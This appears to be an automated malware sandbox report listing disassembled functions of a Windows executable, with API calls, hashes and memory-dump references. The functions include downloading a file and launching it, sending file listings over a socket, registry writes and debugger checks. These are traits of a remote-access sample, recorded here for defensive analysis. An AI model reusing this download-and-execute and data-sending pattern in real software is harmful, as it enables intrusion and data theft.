                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 745075371-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                                                                                                                                                                                                                                                                                                              Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1157919129-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e3be3865a662bd7033acffd5579a2efd1c50595502215b2369426eed0396bd05
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3be3865a662bd7033acffd5579a2efd1c50595502215b2369426eed0396bd05
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                                                                                                                                                                                                                                                                                                              Function 0044801F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00448077
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00448243
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1286116820-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                                                                                                                                                                                                                                                                                                                              Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                                                                                                                                                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, xrefs: 0040627F, 004063A7
                                                                                                                                                                                                                                                                                                                              • open, xrefs: 0040622E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: DownloadExecuteFileShell
                                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$open
                                                                                                                                                                                                                                                                                                                              • API String ID: 2825088817-4183282609
                                                                                                                                                                                                                                                                                                                              • Opcode ID: fcc184a7b6eccc8a2ff9a36e892ddfb87c19da3c58e68189f228df038418f8e7
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcc184a7b6eccc8a2ff9a36e892ddfb87c19da3c58e68189f228df038418f8e7
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                                                                                                                                                                                                                                                                                                              Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileFind$FirstNextsend
                                                                                                                                                                                                                                                                                                                              • String ID: x@G$x@G
                                                                                                                                                                                                                                                                                                                              • API String ID: 4113138495-3390264752
                                                                                                                                                                                                                                                                                                                              • Opcode ID: aa45c7380dacfc66fe06201a8734557564ad94b7e762658309b942cdbaa57718
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa45c7380dacfc66fe06201a8734557564ad94b7e762658309b942cdbaa57718
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                                                                                                                                                                                                                              Function 0041BB87 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                                                                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                                                                                                                                                              • API String ID: 4127273184-3576401099
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                                                                                                                                                                                                                                                                                              Function 00450A8F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                                                                                                                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                                                                                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4212172061-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                                                                                                                                                                                                                                                                                              Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileFind$FirstH_prologNext
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 301083792-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6b2e4d6165e84900f69ecc81641d8f2d0541015075ab51dc4241561e145d6464
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b2e4d6165e84900f69ecc81641d8f2d0541015075ab51dc4241561e145d6464
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                                                                                                                                                                                                                                                                                              Function 00450E7A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2829624132-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                                                                                                                                                                                                                                                                                                              Function 0043A66D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0043A765
                                                                                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0043A76F
                                                                                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0043A77C
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
